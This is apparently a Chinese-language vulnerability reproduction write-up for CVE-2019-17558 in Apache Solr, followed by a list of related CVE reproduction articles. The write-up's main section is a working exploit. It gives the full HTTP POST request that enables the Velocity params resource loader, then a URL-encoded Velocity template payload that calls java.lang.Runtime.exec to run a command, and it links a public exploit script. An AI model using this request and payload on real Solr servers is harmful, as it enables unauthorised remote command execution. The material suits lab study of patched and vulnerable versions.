(CVE-2019-17558)Sorl代碼執行漏洞復現

2021-03-06 WgpSec狼組安全團隊

簡介

通過訪問solr項目的config目錄即可查看和修改params.resource.loader.enabled,然後直接訪問接口構造指定參數就可以達成任意命令執行

影響範圍

Apache Solr 5.0.0版本至8.3.1

漏洞復現

打開solr頁面

然後隨便選擇一個項目進去

將該url改為127.0.0.1:8983/solr/chinese/config

得到以上數據就說明漏洞可能存在,之後在頁面中搜索關鍵字params.resource.loader.enabled查看該值是否為true,默認為false

如果如上圖一樣為fasle,嘗試向該頁面發送post請求構造如下請求包

POST /solr/chinese/config HTTP/1.1Host: solr:8983User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/jsonContent-Length: 259{  "update-queryresponsewriter": {  "startup": "lazy",  "name": "velocity",  "class": "solr.VelocityResponseWriter",  "template.base.dir": "",  "solr.resource.loader.enabled": "true",  "params.resource.loader.enabled": " true"  }}



回顯如上圖就是修改成功,再次訪問127.0.0.1:8983/solr/chinese/config,發現params.resource.loader.enabled已經變為了true

接著直接輸入以下url即可

127.0.0.1:8983/solr/ chinese /select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set(x=%27%27)+%23set(rt=x.class.forName(%27java.lang.Runtime%27))+%23set(chr=x.class.forName(%27java.lang.Character%27))+%23set(str=x.class.forName(%27java.lang.String%27))+%23set(ex=rt.getRuntime().exec(%27id%27))+ex.waitFor()+%23set(out=out=ex.getInputStream())+%23foreach(i+in+[1..i+in+[1..out.available()])str.valueOf(str.valueOf(chr.toChars($out.read()))%23end


順帶在貼一個利用腳本https://github.com/jas502n/solr_rce

相關焦點

  • 漏洞復現之七:CVE-2019-17558 Apache Solr Velocity 注入遠程命令執行漏洞
    在其 5.0.0 到 8.3.1版本中,用戶可以注入自定義模板,通過Velocity模板語言執行任意命令。0x01 影響版本0x02 修復建議0x03 環境搭建漏洞環境使用vulhub中的CVE-2019-17558這個環境搭建$ cd solr/CVE-2019-17558$ docker-compose up -d訪問 your-ip:8983 即可看到 solr 頁面0x04 漏洞復現1、默認情況下params.resource.loader.enabled
  • Drupal 遠程代碼執行漏洞(CVE-2019-6339)復現
    漏洞概述Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的內置phar stream wrapper(PHP)存在遠程代碼執行漏洞。遠程攻擊者可利用該漏洞執行任意的php代碼。
  • vulhub漏洞復現練習——phpMyAdmin(CVE-2016-5734)(遠程代碼執行漏洞)
    phpMyAdmin(CVE-2016-5734)(遠程代碼執行漏洞)漏洞復現環境是在kali裡面配置的vulhub
  • 漏洞預警|Jackson遠程代碼執行高危漏洞分析(CVE-2019-12384)
    我們分析復現如何利用此反序列化漏洞來觸發伺服器端請求偽造(SSRF)漏洞和遠程代碼執行漏洞(RCE)。漏洞對應的編號為CVE-2019-12384,RedHat的多個分支受該漏洞影響,如下所示:JDBC的全稱是「(J)ava (D)ata(b)ase (C)onnectivity」,這是一個Java API,用來連接資料庫並執行查詢語句,也是JavaSE(Java Standard Edition)的一部分。此外,JDBC使用了字符串到類的自動化映射,因此在整條攻擊鏈中,這是用來加載並執行更多「gadget」的絕佳目標。
  • CVE-2019-12384 Jackson遠程代碼執行復現
    一、漏洞介紹CVE編號:CVE-2019-12384發布時間:2019-6-21危害等級:高危
  • 【漏洞預警】CVE-2019-0708微軟遠程桌面服務遠程代碼執行漏洞(BlueKeep)復現
    ,其作業系統遠程桌面(Remote Desktop Services),俗稱的3389服務存在嚴重安全漏洞(編號CVE-2019-0708):攻擊者在沒有任何授權的情況下,可以遠程直接攻擊作業系統開放的3389服務,在受害主機上執行惡意攻擊行為,包括安裝後門,查看、篡改隱私數據,創建擁有完全用戶權限的新帳戶,影響範圍從Windows XP到Windows 2008 R2。
  • SharePoint 2019 XSS漏洞CVE-2020-1456復現
    寫在前面的話在這篇文章中,我們將分析SharePoint 2019中的一個安全漏洞。
  • CVE-2019-0708 漏洞分析及相關測試
    前言在CVE-2019-0708公布後幾天就已經嘗試過復現該漏洞,但藉助當時exp並沒能成功復現反彈shell的過程遂放棄,故藉助這次漏洞復現報告再來嘗試復現該漏洞
  • 技術乾貨 | 漏洞復現:CVE-2020-0796(SMBv3遠程代碼執行)漏洞復現
    目錄CVE-2020-0796    漏洞描述    漏洞危害等級            影響版本    漏洞復現    實現本地提權CVE-2020-0796漏洞描述>      2020年3月10日,微軟在其官方SRC發布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客戶端和服務端存在遠程代碼執行漏洞。
  • Apache Solr 漏洞復現
    Apache Solr Velocity 注入遠程命令執行漏洞 (CVE-2019-17558)漏洞描述Solr是Apache
  • CVE-2020-11107:XAMPP任意命令執行漏洞復現
    當攻擊者將編輯器的值設置為惡意的.exe文件或.bat文件,與此同時如果有管理員帳號通過XAMPP控制面板查看apache的日誌文件,便會執行惡意的.exe文件或.bat文件,以此達到任意命令執行。*,<7.4.40x03環境搭建● 漏洞環境:1.準備一臺裝有window系統的虛擬機,本次復現以windows10系統為例。
  • PostgreSQL 高權限命令執行漏洞(CVE-2019-9193)復現
    > 簡介 PostgreSQL( 讀作 Post-Gres-Q-L)是一個功能非常強大的、原始碼開放的客戶
  • CVE-2019-0708 本地復現
    本文作者:Leafer(貝塔安全實驗室-核心成員)Windows系列伺服器於2019年5月15號,被爆出高危漏洞,該漏洞影響範圍較廣
  • Atlassian Jira 模板注入漏洞(CVE-2019-11581)復現
    漏洞描述Atlassian Jira是企業廣泛使用的項目與事務跟蹤工具,被廣泛應用於缺陷跟蹤、客戶服務、需求收集
  • CVE-2017-11882 office緩存溢出漏洞復現
    電腦中有9臺電腦用的是盜版,即便激活成功大多也是盜版的授權許可,在如此大的基數下,國內辦公軟體行業市場現狀,office必定屬於前列,所以搜索相關文章,綜合分析,感覺都在說,微軟Office套件最有效的攻擊手段,是基於CVE-2017-11882的漏洞,於是乎找到cve-2017-11882這個漏洞,做漏洞復現,隨有下文。
  • CVE-2020-2883漏洞復現
    (CVE-2020-2883、CVE-2020-2884),允許未經身份驗證的攻擊者通過T3協議網絡訪問並破壞易受攻擊的WebLogic Server,成功的漏洞利用可導致WebLogic Server被攻擊者接管,從而造成遠程代碼執行。
  • Microsoft Windows Defender遠程代碼執行漏洞(CVE-2021-1647)復現
    Microsoft:Microsoft Defender:Windows 10 Version 1909 for x64-based Systems-Microsoft:Microsoft Defender:Windows 10 Version 1909 for 32-bit Systems-Microsoft:Microsoft Defender:Windows Server 2019
  • Apache Unomi 遠程代碼執行漏洞復現(CVE-2020-13942)
    漏洞介紹Apache Unomi是一個Java開源客戶數據平臺,這是一個Java伺服器
  • 【超詳細 | 附PoC】CVE-2021-2109 | Weblogic Server遠程代碼執行漏洞復現
    0x01 前言CVE-2021-2109,該漏洞為Weblogic的遠程代碼執行漏洞。
  • CVE-2018-7600 Drupal遠程執行漏洞復現
    三年前,Drupal安全團隊披露了一個非常關鍵的漏洞,編號CVE-2018-7600 Drupal對表單請求內容未做嚴格過濾,因此,這使得攻擊者可能將惡意注入表單內容,此漏洞允許未經身份驗證的攻擊者在默認或常見的Drupal安裝上執行遠程代碼執行。由於公開較久,實戰遇到可能性不大,但並不影響我們搭建靶機進行漏洞復現實驗。本文以Drupal漏洞為例子,教大家如何使用LadonEXP一鍵生成POC。